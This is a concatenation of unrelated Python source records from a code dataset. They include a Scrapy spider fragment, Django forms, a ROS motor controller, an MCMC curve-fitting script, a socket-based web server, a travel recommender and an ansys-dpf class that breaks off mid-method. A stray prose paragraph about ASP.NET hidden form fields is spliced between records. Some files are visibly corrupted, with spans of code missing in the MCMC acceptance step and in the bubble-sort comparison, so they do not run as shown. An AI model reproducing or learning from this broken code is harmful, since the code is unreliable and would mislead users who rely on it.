'//p[@id=\"vacancy-expected-duration\"]/text()')\n loader.add_xpath(\n 'description',\n 
[\n '//h2[text()=\"Apprenticeship summary\"]|//div[@itemprop=\"responsibilities\"]',\n '//h2[text()=\"Traineeship details\"]|//h2[text()=\"Traineeship details\"]/following-sibling::div[1]'\n ]\n )\n loader.add_xpath(\n 'responsibilities',\n '//h2[text()=\"Training provider\"]|//h2[text()=\"Training provider\"]/following-sibling::div[1]'\n )\n loader.add_xpath(\n 'company',\n [\n '//p[@id=\"vacancy-employer-name\"]/text()',\n '//h3[text()=\"Training provider\"]/following-sibling::p[1]/text()'\n ]\n )\n loader.add_xpath(\n 'company_description',\n '//h2[text()=\"About the employer\"]|//h2[text()=\"About the employer\"]/following-sibling::div[1]',\n NormalizedJoin()\n )\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/apprenticeshipvacancy.py","file_name":"apprenticeshipvacancy.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
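The spider above leans on get_hidden_inputs to echo ASP.NET state fields (__VIEWSTATE and friends) back on every form post. The brightcorp version is not shown, but a plausible standalone equivalent using parsel looks like this:

from parsel import Selector

def get_hidden_inputs(html_text):
    # Collect every hidden input's name/value pair so the next FormRequest
    # can reproduce the server-side form state.
    sel = Selector(text=html_text)
    fields = {}
    for node in sel.xpath('//input[@type="hidden"]'):
        name = node.xpath('@name').get()
        if name:
            fields[name] = node.xpath('@value').get() or ""
    return fields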
+{"seq_id":"635090837","text":"from django import forms\nfrom django.urls import reverse\nfrom django.forms import Textarea,CheckboxSelectMultiple\n\nfrom .models import Post, Comment, Profile\nfrom django.contrib.auth import get_user_model\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Div, Layout, Submit\nfrom crispy_forms.bootstrap import InlineField\n\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django_registration.forms import RegistrationFormCaseInsensitive, RegistrationFormTermsOfService\n\nclass CrispyModelForm(forms.ModelForm):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(CrispyModelForm, self).__init__(*args, **kwargs)\n\t\tself.helper = FormHelper(self)\n\nclass CrispyForm(forms.Form):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(CrispyForm, self).__init__(*args, **kwargs)\n\t\tself.helper = FormHelper(self)\n\nclass PostForm(CrispyModelForm):\n\tclass Meta:\n\t\tmodel = Post\n\t\tfields = ['title','entry','private','show_recent']\n\t\tlabels = {\n\t\t\t'show_recent': 'Show on Front Page',\n\t\t\t'private': 'Visibility'\n\t\t}\n\nclass CommentForm(CrispyModelForm):\n\tclass Meta:\n\t\tmodel = Comment\n\t\tfields = ['entry']\n\t\tlabels = {\n\t\t\t'entry': ''\n\t\t}\n\t\twidgets = {\n\t\t\t'entry': Textarea(attrs={'cols': 40, 'rows': 4})\n\t\t}\n\nclass ConfirmDeleteForm(CrispyForm):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(ConfirmDeleteForm, self).__init__(*args, **kwargs)\n\t\tself.helper.add_input(Submit('submit', 'Cancel', css_class='btn-secondary'))\n\t\tself.helper.add_input(Submit('submit', 'Delete', css_class='btn-primary'))\n\nclass UserForm(CrispyModelForm):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(UserForm, self).__init__(*args, **kwargs)\n\t\tself.helper.form_tag = False\n\n\tclass Meta:\n\t\tmodel = get_user_model()\n\t\tfields = ['last_name','email']\n\t\tlabels = {\n\t\t\t'last_name': 'Name',\n\t\t\t'email': 'Email Address'\n\t\t}\n\nclass UserProfileForm(CrispyModelForm):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(UserProfileForm, self).__init__(*args, **kwargs)\n\t\tself.helper.form_tag = False\n\t\tself.helper.add_input(Submit('submit', 'Save', css_class='btn-primary'))\n\n\tclass Meta:\n\t\tmodel = Profile\n\t\tfields = ['profile','avatar','banner']\n\nclass PasswordChangeForm(PasswordChangeForm):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.helper = FormHelper(self)\n\t\tself.helper.add_input(Submit('submit', 'Change Password', css_class='btn-primary'))\n\nclass UploadFilesForm(CrispyForm):\n\tfiles = forms.FileField(widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(UploadFilesForm, self).__init__(*args, **kwargs)\n\t\tself.helper.form_tag = False\n\t\tself.helper.form_show_labels = False\n\nclass CreateFolderForm(CrispyForm):\n\tnew_folder = forms.CharField(strip=True)\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(CreateFolderForm, self).__init__(*args, **kwargs)\n\t\tself.helper.form_tag = False\n\t\tself.helper.form_show_labels = False\n\nclass FileRenameForm(forms.Form):\n\told_name = forms.CharField(strip=True)\n\tnew_name = forms.CharField(strip=True)\n\nclass FileDeleteForm(forms.Form):\n\tdelete = forms.CharField(strip=True)\n\nclass RegistrationForm(RegistrationFormCaseInsensitive, RegistrationFormTermsOfService):\n\tpass\n\nbulk_actions = [\n\t('visible_only_me','Set Visible to Only Me'),\n\t('visible_registered','Set Visible to Registered 
Users'),\n\t('visible_regular','Set Visible to Regular Users'),\n\t('visible_public','Set Visible to Public'),\n\t('visible_staff','Set Visible to Staff'),\n\t('delete','Delete Posts (NO UNDO)'),\n]\n\nclass UserManagePostsForm(CrispyForm):\n\tposts = forms.ModelMultipleChoiceField(queryset=None,widget=CheckboxSelectMultiple)\n\taction = forms.ChoiceField(choices=bulk_actions)\n\tdef __init__(self, user, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.fields['posts'].queryset = Post.posts_visible(user).filter(user=user)\n\t\tself.helper.form_tag = False\n\t\tself.helper.field_template = 'bootstrap4/layout/inline_field.html'\n\t\tself.helper.layout = Div(Layout(\n\t\t\t\tInlineField('action', css_class='flex-grow-1'),\n\t\t\t\tSubmit('submit', 'Update Posts', css_class='btn-primary ml-3'),\n\t\t),css_class='form-inline justify-content-end')\n\nfrom django.utils import timezone\nclass UserManagePostsByDateForm(CrispyForm):\n\tolder_than = forms.DateTimeField(initial=timezone.now)\n\taction = forms.ChoiceField(choices=bulk_actions)\n\tconfirm = forms.BooleanField(initial=False, required=True)\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.helper.add_input(Submit('submit', 'Update Posts', css_class='btn-primary'))\n","sub_path":"user/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"645055301","text":"#!/usr/bin/env python\n\n\"\"\"\n#The differential controller script is responsible sending velocity commands\n#to the Arduino that controls de DC Motors. Here the Twist message coming from \n#the teleop device is converted into MotorCommand message used by the Arduino.\n\"\"\"\n\nimport rospy\nfrom deepfind_package.msg import MotorCommand\nfrom geometry_msgs.msg import Twist\n\n# Motor global variables \nglobal dict\ndict = {'MOTOR_CAP': 40, 'FORWARD': 0, 'BACKWARD': 1}\n\n# Converts incoming Twist message to Motorommand message and\n# sends the command to the Arduino.\ndef diff_control_callback(twistData):\n command = MotorCommand()\n command.leftMotorPower = int((twistData.linear.x + twistData.angular.z) * dict['MOTOR_CAP'])\n command.rightMotorPower = int((twistData.linear.x - twistData.angular.z) * dict['MOTOR_CAP'])\n\n if command.leftMotorPower > 0:\n \tcommand.leftMotorDirection = dict['FORWARD']\n else:\n command.leftMotorDirection = dict['BACKWARD']\n \n if command.rightMotorPower > 0:\n command.rightMotorDirection = dict['FORWARD']\n else:\n command.rightMotorDirection = dict['BACKWARD']\n\n command.leftMotorPower = abs(command.leftMotorPower)\n command.rightMotorPower = abs(command.rightMotorPower)\n \t\n pub = rospy.Publisher('motor_speed', MotorCommand, queue_size = 10)\n pub.publish(command)\n\n# Main function, waits for new Twist messages to arrive\n# Creates node and subscriber\ndef diff_controller_listener():\n rospy.init_node('differential_controller')\n rospy.Subscriber('cmd_vel', Twist, diff_control_callback)\n rospy.spin()\n\nif __name__ == '__main__':\n diff_controller_listener()\n\n\n","sub_path":"catkin_ws/src/deepfind_package/scripts/diff_motor_controller.py","file_name":"diff_motor_controller.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"636744835","text":"import numpy as np\nimport matplotlib.pyplot as plt\ndef model(x, a, b, c):\n return a*np.square(x) + b*x + c\n\ndef loglikelihood(x_obs, y_obs, sigma_y_obs, a, b, c):\n d = y_obs - model(x_obs, a, b, c)\n d = d/sigma_y_obs\n d = -0.5 * np.sum(d**2)\n return d\n\ndef logprior(a, b, c):\n p = -np.inf\n if -3 < a < -0.5 and -3 < b < 3 and -1 < c < 10 :\n p = 0.0\n return p\n\nx_obs = np.array([-2.0,1.3,0.4,5.0,0.1, -4.7, 3.0, -3.5,-1.1])\ny_obs = np.array([ -1.931, 2.38, 1.88, -24.22, 3.31, -21.9, -5.18, -12.23, 0.822])\nsigma_y_obs = np.array([ 2.63, 6.23, -1.461, 1.376, -4.72, 1.313, -4.886, -1.091, 0.8054]) \n\nN = 50000\nlista_a = np.zeros(N)\nlista_b = np.zeros(N)\nlista_c = np.zeros(N)\nlogposterior = np.zeros(N)\n\nlista_a[0] = np.random.uniform(-3, -0.5)\nlista_b[0] = np.random.uniform(-3, 3)\nlista_c[0] = np.random.uniform(-1, 10)\ni = 0\nlogposterior[0] = loglikelihood(x_obs, y_obs, sigma_y_obs, lista_a[i-1], lista_b[i-1], lista_c[i-1]) + logprior(lista_a[i-1], lista_b[i-1], lista_c[i-1])\n\nsigma_delta_c = 0.1\nsigma_delta_b = 0.08\nsigma_delta_a = 0.05\n\n#### DATOS\nfor i in range(1,N):\n propuesta_a = np.random.normal(loc=lista_a[i-1], scale=sigma_delta_a)\n propuesta_b = np.random.normal(loc=lista_b[i-1], scale=sigma_delta_b)\n propuesta_c = np.random.normal(loc=lista_c[i-1], scale=sigma_delta_c)\n\n logposterior_viejo = loglikelihood(x_obs, y_obs, sigma_y_obs, lista_a[i-1], lista_b[i-1], lista_c[i-1]) + logprior(lista_a[i-1], lista_b[i-1], lista_c[i-1])\n logposterior_nuevo = loglikelihood(x_obs, y_obs, sigma_y_obs, propuesta_a, propuesta_b, propuesta_c) + logprior(propuesta_a, propuesta_b, propuesta_c)\n\n r = min(1,np.exp(logposterior_nuevo-logposterior_viejo))\n alpha = np.random.random()\n if(alpha={a_model:.4f}$\")\n\nplt.subplot(1, 3, 2)\nplt.hist(lista_b, bins=40, density = True)\nplt.xlabel(\"$b$\")\nplt.title(f\"$={b_model:.4f}$\")\n\nplt.subplot(1, 3, 3)\nplt.hist(lista_c, bins=40, density = True)\nplt.xlabel(\"$c$\")\nplt.title(f\"$={c_model:.4f}$\")\nplt.tight_layout()\n#plt.savefig(\"individual_histograms.pdf\", dpi = 200)\n\nplt.figure(figsize=(12, 7))\nxplot = np.linspace(x_obs.min(), x_obs.max(), 100)\ny_model = model(xplot, a_model , b_model, c_model)\n\nplt.errorbar(x_obs,y_obs, yerr=sigma_y_obs, fmt='o', label = \"Data\")\nplt.plot(xplot, y_model, label = f\"Model: $y = {a_model:.3f}x^2 + {b_model:.3f}x + {c_model:.3f}$\")\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.legend(loc = 'best')\nplt.savefig(\"results_plot.pdf\", dpi = 200)\nplt.show()","sub_path":"Exercises/Ejercicio 6/DanielOchoa_Ejercicio6.py","file_name":"DanielOchoa_Ejercicio6.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"24174591","text":"from zope.pagetemplate import pagetemplatefile, engine\nfrom zope.app.pagetemplate import viewpagetemplatefile\n\nclass Context(engine.ZopeContextBase):\n def translate(self, msgid, domain=None, mapping=None, default=None):\n return i18n.translate(\n msgid, domain, mapping, context=self.principal, default=default)\n\nclass ZopeEngine(engine.ZopeEngine):\n _create_context = Context\n def getContext(self, __namespace=None, **namespace):\n if __namespace:\n if namespace:\n namespace.update(__namespace)\n else:\n namespace = __namespace\n\n context = self._create_context(self, namespace)\n\n # Put principal into context so path traversal can find it\n if 'principal' in namespace:\n context.principal = namespace['principal']\n\n # Put context into context so path traversal can find it\n if 'context' in namespace:\n context.context = namespace['context']\n\n return context\n\nEngine = engine._TrustedEngine(ZopeEngine())\n\nclass AppPT(object):\n def pt_getEngine(self):\n return Engine\n\nclass PageTemplateFile(AppPT, pagetemplatefile.PageTemplateFile):\n\n def __init__(self, filename, _prefix=None):\n _prefix = self.get_path_from_prefix(_prefix)\n super(PageTemplateFile, self).__init__(filename, _prefix)\n\n def pt_getContext(self, instance, **_kw):\n # instance is object with 'context' and 'principal' atttributes.\n namespace = super(PageTemplateFile, self).pt_getContext(**_kw)\n namespace['view'] = instance\n namespace['context'] = context = instance.context\n return namespace\n\n def __call__(self, instance, *args, **keywords):\n namespace = self.pt_getContext(\n instance=instance, args=args, options=keywords)\n s = self.pt_render(\n namespace,\n showtal=getattr(instance, 'showTAL', 0),\n sourceAnnotations=getattr(instance, 'sourceAnnotations', 0),\n )\n return s\n\n def __get__(self, instance, type):\n return viewpagetemplatefile.BoundPageTemplate(self, instance)\n","sub_path":"zc.notification/trunk/src/zc/notification/requestless.py","file_name":"requestless.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"425344626","text":"destinations = [\"Paris, France\", \"Shanghai, China\", \"Los Angeles, USA\", \"Sao Paulo, Brazil\", \"Cairo, Egypt\"]\ntest_traveler = ['Erin Wilkes', 'Shanghai, China', ['historical site','art']]\n#To obtain the index of a particular destination in the destinations list \ndef get_destination_index(destination):\n for i in range(len(destinations)):\n if( destinations[i] == destination):\n destination_index = i\n return destination_index\n\n#print(get_destination_index(\"Los Angeles, USA\"))\n#print(get_destination_index(\"Hyderabad, India\")) \n#print(destinations.index(\"Hyderabad, India\"))\n\n#to get the index of the location of the traveller(current location)\ndef get_traveler_location(traveler):\n traveler_destination = traveler[1] #as traveller is a list containing name of the traveller, location and interests.\n traveler_destination_index = get_destination_index(traveler_destination)\n return traveler_destination_index\n#example of how to use get_traveler_location with traveler -'test_traveler' which is defined above\ntest_destination_index = get_traveler_location(test_traveler)\n#print(test_destination_index ) #location of test_traveler is printed on terminal\n\n#defining a list of attractions. This list will contain sublists containing each of the attractions present in a destination, hence the range is len()+1\nattractions = [[] for i in range(len(destinations)+1)]\n#print(attractions)- will print a list containing 5 empty sublists as 5 is the no of destinations in total\n\n#The following function adds attraction(s) to a particular destination\ndef add_attraction(destination, attraction):\n destination_index = get_destination_index(destination) \n \n attractions_for_destinations = attractions[destination_index]\n attractions_for_destinations.append(attraction)\n return \n\nadd_attraction(\"Los Angeles, USA\", [\"Venice Beach\", [\"beach\"]])\n#print(attractions)\nadd_attraction(\"Paris, France\", [\"the Louvre\", [\"art\", \"museum\"]])\nadd_attraction(\"Paris, France\", [\"Arc de Triomphe\", [\"historical site\", \"monument\"]])\nadd_attraction(\"Shanghai, China\", [\"Yu Garden\", [\"garden\", \"historcical site\"]])\nadd_attraction(\"Shanghai, China\", [\"Yuz Museum\", [\"art\", \"museum\"]])\nadd_attraction(\"Shanghai, China\", [\"Oriental Pearl Tower\", [\"skyscraper\", \"viewing deck\"]])\nadd_attraction(\"Los Angeles, USA\", [\"LACMA\", [\"art\", \"museum\"]])\nadd_attraction(\"Sao Paulo, Brazil\", [\"So Paulo Zoo\", [\"zoo\"]])\nadd_attraction(\"Sao Paulo, Brazil\", [\"Ptio do Colgio\", [\"historical site\"]])\nadd_attraction(\"Cairo, Egypt\", [\"Pyramids of Giza\", [\"monument\", \"historical site\"]])\nadd_attraction(\"Cairo, Egypt\", [\"Egyptian Museum\", [\"museum\"]])\n#print(attractions)\n\ndef find_attractions(destination, interests): #this function attractions in a particular destination based on your interests\n destination_index = get_destination_index(destination)\n attractions_in_city = attractions[destination_index]\n attraction_with_interests = []\n possible_attraction = []\n attraction_tags = []\n #return interests\n #return attractions_in_city\n for attraction in attractions_in_city:\n possible_attraction=attraction\n attraction_tags=attraction[1]\n #return possible_attraction, attraction_tags, interests\n for interest in interests:\n for tag in attraction_tags:\n if(tag == interest):\n attraction_with_interests.append(possible_attraction[0])\n return attraction_with_interests[0]\n#print(find_attractions('Shanghai, China', 
['art', 'museum']))\n\ndef get_attractions_for_traveler(traveler): #main engine which would give you your recommendations according to your desired destinantion and interests\n interests_string = 'a'\n traveler_destination = traveler[1]\n traveler_interests = traveler[2]\n traveler_attractions = find_attractions(traveler_destination, traveler_interests)\n interests_string = 'Hi '+ traveler[0] +', we think you will like these places around '+ traveler_destination + ': '\n for attraction in traveler_attractions:\n interests_string = interests_string + attraction \n interests_string = interests_string \n \n \n return interests_string + \".\"\n\n\n#Enter your information here. I know you need a GUI coz u a rich kid but I a noob so I built this, will add GUI in the future.\nHarsimrat_kohli = get_attractions_for_traveler(['Harsimrat Kohli', 'Paris, France', ['monument']])\nprint(Harsimrat_kohli)\n\n \n \n \n \n \n \n \n \n \n \n\n\n\n\n\n\n\n \n \n\n\n\n\n \n \n\n \n\n","sub_path":"Desktop/Python codes/Boredless_tourist.py","file_name":"Boredless_tourist.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"603812169","text":"def bubble(ls):\n for i in range(len(ls)-1):\n j=0\n while jls[j+1][0] or(ls[j][0]==ls[j+1][0] and ls[j][1]>ls[j+1][1]):\n ls[j],ls[j+1]=ls[j+1],ls[j]\n j=j+1\n for i in range(len(ls)):\n for j in range(len(ls[i])):\n ls[i][j]=ls[i][j]+1\n return ls\n\ndef canmove(ls):\n n=ls[0]\n m=ls[1]\n canleft=True\n canright=True\n canup=True\n candown=True\n if m==0:\n canleft=False\n if canleft and not barrier.__contains__([n,m-1]):\n return True\n if m==M-1:\n canright=False\n if canright and not barrier.__contains__([n,m+1]):\n return True\n if n==0:\n canup=False\n if canup and not barrier.__contains__([n-1,m]):\n return True\n if n==N-1:\n candown=False\n if candown and not barrier.__contains__([n+1,m]):\n return True\n return False\n\n\nnums=input().split(\" \")\nN=int(nums[0])\nM=int(nums[1])\nbarrier=[]\nfor i in range(N):\n s=input()\n for j in range(M):\n if s[j]=='#':\n barrier.append([i,j])\n#i+j偶数为黑点,奇数为白点\neven=[]\nodd=[]\ncant=[]#不能走的点\nprint(barrier)\nfor i in range(N):\n for j in range(M):\n if not barrier.__contains__([i,j]):\n if not canmove([i,j]):\n cant.append([i,j])\n else:\n if (i+j)%2==0:\n even.append([i,j])\n else:\n odd.append([i,j])\nresult=[]+cant\nif len(even)>len(odd):\n result=result+even\nelif len(odd)>len(even):\n result=result+odd\nprint(result)\nif len(result)==0:\n print(0)\nelse:\n result=bubble(result)\n print(len(result))\n for i in range(len(result)):\n s=str(result[i][0])\n for j in range(1,len(result[i])):\n s=s+\" \"+str(result[i][j])\n print(s)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Code/CodeRecords/2348/60796/292993.py","file_name":"292993.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"310376222","text":"'''\nCreated on 23 May 2020\n\n@author: snake91\n'''\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vispy: gallery 60\n\n\"\"\"\nDynamic planar graph layout.\n\"\"\"\n\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vispy: gallery 2\n# Copyright (c) Vispy Development Team. All Rights Reserved.\n# Distributed under the (new) BSD License. See LICENSE.txt for more info.\n\n\"\"\"\nMultiple real-time digital signals with GLSL-based clipping.\n\"\"\"\n\nfrom vispy import gloo\nfrom vispy import app\nimport numpy as np\nimport math\n\n# Number of cols and rows in the table.\nnrows = 1\nncols = 1\n\n# Number of signals.\nm = nrows*ncols\n\n# Number of samples per signal.\nn = 1000\n\n# Various signal amplitudes.\namplitudes = .1 + .2 * np.random.rand(m, 1).astype(np.float32)\n\n# Generate the signals as a (m, n) array.\ny = amplitudes * np.random.randn(m, n).astype(np.float32)\n\n# Color of each vertex (TODO: make it more efficient by using a GLSL-based\n# color map and the index).\ncolor = np.repeat(np.random.uniform(size=(m, 3), low=.5, high=.9),\n n, axis=0).astype(np.float32)\n\n# Signal 2D index of each vertex (row and col) and x-index (sample index\n# within each signal).\nindex = np.c_[np.repeat(np.repeat(np.arange(ncols), nrows), n),\n np.repeat(np.tile(np.arange(nrows), ncols), n),\n np.tile(np.arange(n), m)].astype(np.float32)\n\nVERT_SHADER = open(\"/home/snake91/git/ShareCode/stats/cpxnetw/vispyplot/vertexshader.cpp\").read() \nFRAG_SHADER = open(\"/home/snake91/git/ShareCode/stats/cpxnetw/vispyplot/fragshader.cpp\").read()\n\n\nclass Canvas(app.Canvas):\n def __init__(self):\n app.Canvas.__init__(self, title='Use your wheel to zoom!', size = (1280,720),\n keys='interactive')\n self.program = gloo.Program(VERT_SHADER, FRAG_SHADER)\n self.program['a_position'] = y.reshape(-1, 1)\n self.program['a_color'] = color\n self.program['a_index'] = index\n self.program['u_scale'] = (1., 1.)\n self.program['u_size'] = (nrows, ncols)\n self.program['u_n'] = n\n\n gloo.set_viewport(0, 0, *self.physical_size)\n\n self._timer = app.Timer('auto', connect=self.on_timer, start=True)\n\n gloo.set_state(clear_color='black', blend=True,\n blend_func=('src_alpha', 'one_minus_src_alpha'))\n\n self.show()\n\n def on_resize(self, event):\n gloo.set_viewport(0, 0, *event.physical_size)\n\n def on_mouse_wheel(self, event):\n dx = np.sign(event.delta[1]) * .05\n scale_x, scale_y = self.program['u_scale']\n scale_x_new, scale_y_new = (scale_x * math.exp(2.5*dx),\n scale_y * math.exp(0.0*dx))\n self.program['u_scale'] = (max(1, scale_x_new), max(1, scale_y_new))\n self.update()\n\n def on_timer(self, event):\n \"\"\"Add some data at the end of each signal (real-time signals).\"\"\"\n k = 100\n y[:, :-k] = y[:, k:] # here it deletes part of the numbers\n y[:, -k:] = amplitudes * np.random.randn(m, k) # here it adds more numbers\n\n self.program['a_position'].set_data(y.ravel().astype(np.float32))\n self.update()\n\n def on_draw(self, event):\n gloo.clear()\n self.program.draw('line_strip')\n\nif __name__ == '__main__':\n c = Canvas()\n app.run()\n \n \n \n ","sub_path":"stats/cpxnetw/vispyplot/vispyplot.py","file_name":"vispyplot.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"534042429","text":"import argparse\n\ndef init_parser():\n parser = argparse.ArgumentParser(\n prog='ott controller load',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n 'file',\n default='http://developer.trimet.org/schedule/gtfs.zip',\n help='URL or local directory path to GTFS zip FILE',\n )\n parser.add_argument(\n '-c',\n '--create',\n action='store_true',\n default=False,\n help='create new db...'\n )\n parser.add_argument(\n '-d',\n '--database_url',\n default='sqlite:///gtfsdb.db',\n help='DATABASE URL with appropriate privileges'\n )\n parser.add_argument(\n '-l',\n '--local',\n action='store_true',\n default=False,\n help='local ott table updates to the db (e.g., fast / no reload of gtfsdb tables)...'\n )\n parser.add_argument(\n '-g',\n '--is_geospatial',\n action='store_true',\n default=False,\n help='Database IS GEOSPATIAL',\n )\n parser.add_argument(\n '-s',\n '--schema',\n default=None,\n help='Database SCHEMA name',\n )\n args = parser.parse_args()\n return args\n\n","sub_path":"ott/controller/util/argparse_db_loader.py","file_name":"argparse_db_loader.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"381099603","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n \nimport socket\nimport time\nimport router\nimport view\nimport index\nfrom optparse import OptionParser\n\n# Опции запуска\nopts = index.opts\n\n# Проверка файла БД\ndef init():\n try:\n open(opts.db_file, \"r\", encoding=opts.encode)\n except FileNotFoundError:\n import db\n try:\n with open(opts.base_dir + \"db.sql\", \"r\", encoding=opts.encode) as sql:\n for line in sql:\n db.execute(line)\n except:\n pass\n\n# Запуск сервера\ndef new_server():\n global opts\n\n # Экземпляр роутера\n r = router.RequestHandler()\n\n # Вызов функции настройки роутинга\n index.set_handlers(r)\n\n # Инициализация сокета\n try:\n serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n serversocket.bind((opts.server, opts.port))\n serversocket.listen(opts.listen)\n except socket.error:\n print('Не удалось создать сокет')\n exit()\n\n print('Ожидание запроса...')\n # Ожидание и обработка коннектов\n try:\n while True:\n conn, addr = serversocket.accept()\n print(\"Новый запрос от \" + addr[0])\n try:\n data = r.Route(conn)\n # Прочие ошибки\n except router.RouteException as err:\n html = view.HTMLObject(\"%s - %s\" % (err.code, err.message))\n html.Style(func=view.main_css, param=dict(filename=opts.css_file))\n html.Body(func=view.error_body, content=err.__dict__)\n r.do_post(conn, err.code, tp=\"text/html; charset=%s\" % opts.encode, data=str(html))\n # Ошибка 500\n except:\n err = router.RouteException(\"500\", \"Internal Server Error\")\n html = view.HTMLObject(\"%s - %s\" % (err.code, err.message))\n html.Style(func=view.main_css, param=dict(filename=opts.css_file))\n html.Body(func=view.error_body, content=err.__dict__)\n r.do_post(conn, err.code, tp=\"text/html; charset=%s\" % opts.encode, data=str(html))\n else:\n try:\n r.do_post(conn, tp=\"text/html; charset=%s\" % opts.encode, data=data)\n except:\n r.do_get(conn, tp=\"text/html; charset=%s\" % opts.encode)\n finally:\n conn.close()\n finally: \n serversocket.close()\n\ndef main():\n # Запуск сервера\n try:\n new_server()\n except ConnectionAbortedError as e:\n print(e)\n main()\n\nif __name__ == \"__main__\":\n try:\n init()\n main()\n except KeyboardInterrupt:\n print(\"Завершение работы...\")\n exit()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"596665602","text":"\"\"\"\nCyclic Support\n==============\n\"\"\"\n\nfrom ansys import dpf\nfrom ansys.dpf.core.scoping import Scoping\nfrom ansys.grpc.dpf import cyclic_support_pb2, cyclic_support_pb2_grpc\n\n\nclass CyclicSupport:\n \"\"\"Represents a cyclic support, which describes a model with cyclic symmetry.\n\n The model has the necessary data for cyclic (and multistage) expansion.\n\n Parameters\n ----------\n cyclic_support : ansys.grpc.dpf.cyclic_support_pb2.CyclicSupport message\n Cyclic support.\n server : DPFServer , optional\n Server with the channel connected to the remote or local instance. The default is\n ``None``, in which case an attempt is made to use the the global server.\n\n Examples\n --------\n Get a cyclic support from a model.\n\n >>> from ansys.dpf import core as dpf\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> model = dpf.Model(multi_stage)\n >>> result_info = model.metadata.result_info\n >>> cyc_support = result_info.cyclic_support\n >>> cyc_support.num_sectors()\n 6\n >>> cyc_support.num_stages\n 2\n\n \"\"\"\n\n def __init__(self, cyclic_support, server=None):\n \"\"\"Initialize time frequency support with its `TimeFreqSupport` message (if possible).\"\"\"\n if server is None:\n server = dpf.core._global_server()\n\n self._server = server\n self._stub = self._connect()\n self._message = cyclic_support\n\n def __str__(self):\n \"\"\"Describe the entity.\n\n Returns\n -------\n str\n Description of the entity.\n \"\"\"\n from ansys.dpf.core.core import _description\n\n return _description(self._message, self._server)\n\n @property\n def num_stages(self) -> int:\n \"\"\"Number of cyclic stages in the model\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> cyc_support.num_stages\n 2\n\n Returns\n -------\n int\n Number of cyclic stages in the model.\n \"\"\"\n return self._stub.List(self._message).num_stages\n\n def num_sectors(self, stage_num=0) -> int:\n \"\"\"Number of sectors to expand on 360 degrees.\n\n Parameters\n ----------\n stage_num : int , optional\n Number of the stages required (from 0 to num_stages).\n\n Returns\n -------\n int\n Number of sectors to expand on 360 degrees.\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> cyc_support.num_sectors(0)\n 6\n >>> cyc_support.num_sectors(1)\n 12\n\n \"\"\"\n return self._stub.List(self._message).stage_infos[stage_num].num_sectors\n\n def base_nodes_scoping(self, stage_num=0) -> int:\n \"\"\"Retrieve a nodal scoping containing node IDs in the\n base sector of the given stage.\n\n Parameters\n ----------\n stage_num : int, optional\n Number of the stage required (from 0 to num_stages).\n\n Returns\n -------\n base_nodes_scoping : Scoping\n Nodes IDs in the base sector of the given stage.\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> base = cyc_support.base_nodes_scoping(0)\n\n \"\"\"\n return Scoping(\n 
